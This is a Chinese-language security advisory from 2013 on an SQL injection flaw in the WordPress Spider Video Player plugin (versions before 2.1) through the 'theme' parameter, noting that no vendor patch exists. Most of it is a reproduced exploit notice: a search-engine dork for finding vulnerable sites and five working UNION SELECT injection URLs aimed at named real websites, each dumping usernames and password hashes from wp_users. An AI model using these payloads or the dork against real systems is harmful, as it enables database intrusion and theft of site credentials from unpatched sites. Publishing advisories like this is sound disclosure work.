WordPress Spider Video Player插件'theme'参数SQL注入漏洞
WordPress Spider Video Player插件'theme'参数SQL注入漏洞
发布日期:2013-04-11
更新日期:2013-04-12
受影响系统:
WordPress Spider Video Player < 2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59021
WordPress Spider Video Player是视频播放器插件。
Spider Video Player 2.1存在SQL注入漏洞,攻击者可利用此漏洞执行未授权数据库操作。
<*来源:Ashiyane Digital Security Team
链接:http://packetstormsecurity.com/files/121250/WordPress-Spider-Video-Player-2.1-SQL-Injection.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##############
# Exploit Title : Wordpress Spider Video Player plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link : http://web-dorado.com/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 2.1
#
# Dork : inurl:wp-content/plugins/player/settings.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
#
#
#DEm0:
# http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
# http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############
建议:
--------------------------------------------------------------------------------
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://wordpress.org/extend/plugins/player/
评论暂时关闭